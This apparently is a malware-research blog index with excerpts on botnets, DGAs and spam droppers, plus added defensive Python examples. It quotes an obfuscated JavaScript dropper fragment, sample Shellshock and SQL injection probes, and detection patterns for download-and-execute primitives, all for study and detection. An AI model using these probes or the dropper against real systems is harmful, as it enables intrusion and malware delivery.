Upcoming Sality presentation at Botconf

Update: The presentation is available here and the paper here. The Virus Tracker team will join the Botconf’15 conference in Paris, France! We will hold a presentation about Sality. Abstract: Sality is one of the longest-lived threats and probably the most underrated botnet ever. It made its first appearance in 2003 and is still active in […]

Zombie malware without command & control servers

As malware needs to communicate in some way with its operators (to receive commands and updates, and to send stolen data), it typically implements a form of communication with command & control servers. Those C&Cs are either hard-coded or generated (based on some type of seed) domain names or IPs. For generated domains they implement a domain […]

CoreBot: A closer look

A week ago our colleagues at IBM published a blog post about a new stealer named “CoreBot”. The post points out that CoreBot has a modular plugin system, is capable of stealing private information including certificates, and has a DGA (domain generation algorithm) implemented. We got our hands on 4 different samples and analyzed them. […]

NetBIOS: Old & known but still posing a threat

There are a few good articles about NetBIOS, like Is it time to get rid of NetBIOS?, NetBIOS spoofing for attacks on browser and Pwning hotel guests, and still it (NetBIOS over TCP/IP) poses a threat to modern systems. NetBIOS was developed in the 80s and, strictly speaking, is just an API, though there is NetBIOS […]
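
The spoofing attacks referenced above work because a NetBIOS name query is a broadcast that any host on the segment may answer. The following is an added example (not code from the linked articles or from Virus Tracker) that implements the RFC 1001/1002 first-level name encoding and builds and parses the NAME QUERY REQUEST a Windows host sends when it resolves a single-label name such as WPAD over NetBIOS. Port, flag values and the WPAD example name are the standard ones; the helper names are this example's own.

```python
"""NetBIOS name encoding and NBNS name-query construction/parsing (added example)."""
import struct

NBNS_PORT = 137                 # UDP port for NetBIOS Name Service
SUFFIX_WORKSTATION = 0x00       # 16th byte: service type, 0x00 = workstation
SUFFIX_FILE_SERVER = 0x20       # 0x20 = file server service


def encode_name(name: str, suffix: int = SUFFIX_WORKSTATION) -> bytes:
    """First-level encoding: pad the name to 15 chars, append the suffix byte,
    then emit each byte as two ASCII letters (high nibble + 'A', low nibble + 'A').
    The result is always 32 bytes."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    out = bytearray()
    for b in raw:
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    return bytes(out)


def decode_name(encoded: bytes):
    """Inverse of encode_name; returns (name, suffix)."""
    if len(encoded) != 32:
        raise ValueError("encoded NetBIOS name must be 32 bytes")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_name_query(name: str, txid: int, suffix: int = SUFFIX_WORKSTATION,
                     broadcast: bool = True) -> bytes:
    """NBNS NAME QUERY REQUEST (RFC 1002 section 4.2.12): 12-byte header plus one
    question. Flags 0x0110 = opcode QUERY, recursion desired (0x0100), broadcast (0x0010)."""
    flags = 0x0100 | (0x0010 if broadcast else 0)
    header = struct.pack(">HHHHHH", txid, flags, 1, 0, 0, 0)   # QDCOUNT=1
    question = b"\x20" + encode_name(name, suffix) + b"\x00"   # one 32-byte label
    question += struct.pack(">HH", 0x0020, 0x0001)             # QTYPE NB, QCLASS IN
    return header + question


def parse_name_query(pkt: bytes) -> dict:
    """Parse a single-question NBNS packet; raises ValueError on malformed input.
    'is_response' lets a monitor spot unsolicited answers (a spoofing responder)."""
    if len(pkt) < 12 + 1 + 32 + 1 + 4:
        raise ValueError("packet too short for a NBNS name query")
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", pkt[:12])
    if pkt[12] != 0x20:
        raise ValueError("unexpected label length")
    name, suffix = decode_name(pkt[13:45])
    if pkt[45] != 0:
        raise ValueError("name not terminated")
    qtype, qclass = struct.unpack(">HH", pkt[46:50])
    return {"txid": txid, "opcode": (flags >> 11) & 0xF,
            "is_response": bool(flags & 0x8000), "broadcast": bool(flags & 0x0010),
            "name": name, "suffix": suffix, "qtype": qtype, "qclass": qclass}


if __name__ == "__main__":
    pkt = build_name_query("WPAD", txid=0x1234)
    print(pkt.hex())
    print(parse_name_query(pkt))
```

Sending the packet to the subnet broadcast address on UDP/137 (not done here) reproduces the lookup a victim performs; watching for replies whose source is not the expected name server is the simplest detection for a spoofing host on the segment.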

Javascript infectors arriving via email spam

Recently we have been receiving multiple spam messages that had zip files attached with .js files inside. They try to trick the user into opening the JavaScript files, which would download and execute Trojans. This is the contents of 00242116.doc.js, which was in the zip file: var stroke="5556515E0D0A020B240F08010D17170A01164A0B1603";function squ61() { return 'gs'; }; function squ214() […]
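
A mail gateway or analyst can catch this lure before a user opens it. The following is an added example, not the Virus Tracker team's tooling: it inspects a zip attachment for script members, flags the document-mimicking double extension (00242116.doc.js) and looks for the Windows Script Host download-and-execute primitives such droppers rely on. The zip and the script inside it are constructed stand-ins built in memory so the script runs offline; the stand-in is not the sample quoted above and does nothing when run.

```python
"""Triage of zip attachments carrying script files (added example)."""
import io
import re
import zipfile

SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta"}
DOC_EXTS = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".txt", ".jpg"}
# Strings a WSH downloader needs to fetch and run a payload. Their presence is a
# heuristic indicator, not proof of malice.
SUSPICIOUS_API = re.compile(
    r"ActiveXObject|WScript\.Shell|MSXML2\.XMLHTTP|ADODB\.Stream|\.Run\(|eval\(",
    re.IGNORECASE)


def triage_zip(data: bytes) -> list:
    """Return one finding per archive member that is a script.

    Each finding lists why it was flagged: script extension, double extension
    that mimics a document, and any download/execute primitives found in the body.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename.lower()
            parts = name.rsplit("/", 1)[-1].split(".")
            if len(parts) < 2:
                continue
            ext = "." + parts[-1]
            if ext not in SCRIPT_EXTS:
                continue
            reasons = [f"script attachment ({ext})"]
            if len(parts) >= 3 and "." + parts[-2] in DOC_EXTS:
                reasons.append(f"double extension mimics .{parts[-2]}")
            body = zf.read(info).decode("latin-1", errors="replace")
            apis = sorted({m.group(0) for m in SUSPICIOUS_API.finditer(body)})
            if apis:
                reasons.append("uses " + ", ".join(apis))
            findings.append({"member": info.filename, "reasons": reasons})
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: a zip holding a lure-named script (harmless stand-in body)."""
    js = ('var o = new ActiveXObject("MSXML2.XMLHTTP");\n'
          'var sh = new ActiveXObject("WScript.Shell");\n'
          '// stand-in body; the real sample decoded a hex string at this point\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("00242116.doc.js", js)
        zf.writestr("readme.txt", "nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding["member"], "->", "; ".join(finding["reasons"]))
```

In production the same checks belong on the gateway's attachment hook; blocking script extensions inside archives outright is usually acceptable, since legitimate mail almost never carries them.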

Pony + Pkybot + Automated Transfer System = Banker

A couple of months ago we were analyzing a sample which was tagged as “Pkybot”. The analyzed sample had MD5 7609F372F9AFBAADA6AA330A829C90AF and SHA1 F20CB7A64A4CFE4F7E41E2F983A8F34CDB5C153A; according to its compilation time stamp it was compiled on 10/17/2014 2:34 pm. Analysis showed that it is a Pony sample; there are 2 good analysis reports of Pony here and here. […]

Internet Attacks Against Nuclear Power Plants

We presented “Internet Attacks Against Nuclear Power Plants” at the IAEA International Conference on Computer Security in a Nuclear World in Vienna, Austria on June 3, 2015. You can read the paper here and the presentation slides here.

Sharing the Simda Pseudo DGA

Yesterday Microsoft reported the takedown of Simda. According to that report, Simda communicates with “up to six hard-coded IPs” and has a DGA that it uses to set the Host field in the HTTP header and also as a seed for encryption. This is the reversed algorithm, as reversed from sample MD5 892A0A4DC4C3EEA90BECE60C142AEAF1 […]
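
The "seed plus date" style of DGA that the C&C, CoreBot and Simda posts above refer to, as an added example. This is a constructed, hypothetical algorithm written for this page; it is not the Simda or CoreBot DGA (neither is reproduced here), and the seed, TLD set and helper names are this example's own. It shows the property that makes sinkholing possible: every bot with the same seed derives the same domain list for a given day, so a defender who knows seed and algorithm can pre-compute and register the domains ahead of the operator.

```python
"""Illustrative date-seeded DGA and the sinkhole pre-computation it allows (added example)."""
import datetime
import hashlib

TLDS = ("com", "net", "org", "info")      # hypothetical TLD set for this example
ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def generate_domains(seed: bytes, day: str, count: int = 16) -> list:
    """Return `count` candidate C&C domains for the ISO date `day` (YYYY-MM-DD).

    Constructed scheme: SHA-256 over seed || date || index, label length 8..15
    taken from the first digest byte, letters from the following bytes, TLD from
    the last byte. Deterministic per (seed, day), so bots and defenders agree.
    """
    date = datetime.date.fromisoformat(day)
    domains = []
    for i in range(count):
        material = seed + date.strftime("%Y%m%d").encode() + i.to_bytes(2, "big")
        digest = hashlib.sha256(material).digest()
        length = 8 + digest[0] % 8                      # 8..15 characters
        label = "".join(ALPHABET[b % 26] for b in digest[1:1 + length])
        tld = TLDS[digest[-1] % len(TLDS)]
        domains.append(f"{label}.{tld}")
    return domains


def sinkhole_schedule(seed: bytes, start: str, days: int) -> dict:
    """Map each ISO date in [start, start + days) to its domain list: the
    registration list a sinkhole operator works through in advance."""
    first = datetime.date.fromisoformat(start)
    schedule = {}
    for n in range(days):
        d = (first + datetime.timedelta(days=n)).isoformat()
        schedule[d] = generate_domains(seed, d)
    return schedule


def domains_to_register(schedule: dict, already_registered: set) -> list:
    """Flatten the schedule and drop domains someone (operator or us) already holds."""
    return [d for day in sorted(schedule) for d in schedule[day] if d not in already_registered]


if __name__ == "__main__":
    seed = b"example-seed"                              # constructed sample seed
    plan = sinkhole_schedule(seed, "2015-04-10", 3)
    for day, doms in plan.items():
        print(day, doms[:3], "...")
    print(len(domains_to_register(plan, set())), "domains to register")
```

A bot would try the day's list in order until one domain resolves and answers, which is why the operator needs to register only one of them per day while a sinkhole has to cover all of them; when the DGA output also seeds the encryption, as the Simda report describes, the sinkhole needs the same algorithm to decrypt check-ins.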

Web attacks caught by Virus Tracker

With the largest botnet monitoring system in the world (more than 8,000 domains), we see all kinds of bots connecting to our sinkholes, including robots that try to find and exploit certain vulnerabilities like Shellshock, probe for admin panels or try to find SQL injections. Finding exploit attempts in our dataset Finding such […]
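
The three probe classes named above can be separated from ordinary bot check-ins with a few pattern checks over the request line and headers. The following is an added example, not the Virus Tracker dataset or tooling: it classifies Apache combined-format log lines into Shellshock attempts (the function-definition prefix carried in a header a CGI would export), admin-panel discovery and SQL injection probes. The log lines are constructed for the example and use documentation IP ranges.

```python
"""Classify exploit probes in sinkhole HTTP logs (added example, constructed input)."""
import re
from urllib.parse import unquote

# Shellshock trigger: a "() {" function definition placed in any header value.
SHELLSHOCK = re.compile(r"\(\)\s*\{")
ADMIN_PATHS = ("/phpmyadmin", "/pma", "/wp-login.php", "/wp-admin", "/admin", "/manager/html")
SQLI = re.compile(
    r"('|%27)\s*(or|and)\s+[\w']+\s*=\s*[\w']+|union\s+(all\s+)?select|sleep\(\d+\)|"
    r"information_schema|;\s*--|\bbenchmark\(", re.IGNORECASE)

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')


def classify(line: str):
    """Return (ip, category) for an exploit probe, or None for ordinary traffic."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, referer, ua = m.group("ip"), m.group("referer"), m.group("ua")
    path = unquote(m.group("path"))          # decode %27 etc. before matching
    if SHELLSHOCK.search(ua) or SHELLSHOCK.search(referer) or SHELLSHOCK.search(path):
        return ip, "shellshock"
    if any(path.lower().startswith(p) for p in ADMIN_PATHS):
        return ip, "admin-panel probe"
    if SQLI.search(path):
        return ip, "sqli"
    return None


def summarize(lines) -> dict:
    """Count probes per category over an iterable of log lines."""
    counts = {}
    for line in lines:
        hit = classify(line)
        if hit:
            counts[hit[1]] = counts.get(hit[1], 0) + 1
    return counts


# Constructed sample log: documentation IPs, not real sinkhole traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2015:10:01:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 208 "-" "() { :;}; echo shellshock"',
    '198.51.100.7 - - [10/Mar/2015:10:01:09 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 404 208 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2015:10:02:41 +0000] "GET /index.php?id=1%27%20or%20%271%27=%271 HTTP/1.1" 404 208 "-" "sqlmap/1.0"',
    '192.0.2.44 - - [10/Mar/2015:10:03:00 +0000] "GET / HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.12 - - [10/Mar/2015:10:03:30 +0000] "GET /wp-login.php HTTP/1.1" 404 208 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line))
    print(summarize(SAMPLE_LOG))
```

Decoding the path before matching matters: a scanner that percent-encodes the quote would otherwise slip past the SQL injection pattern, while the Shellshock check has to look at every header that a CGI front end would copy into the environment, not just the request line.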

Virus Tracker under 10 Gbps DDoS Attack

Virus Tracker is right now under a 10 Gbit/s DDoS attack (UDP and TCP). Last November we were already under a 1 Gbit/s DDoS. Again, evidence suggests that it is being orchestrated from the Sality botnet. As you can see in the graph below, this time the criminals exhausted the maximum connection speed of the […]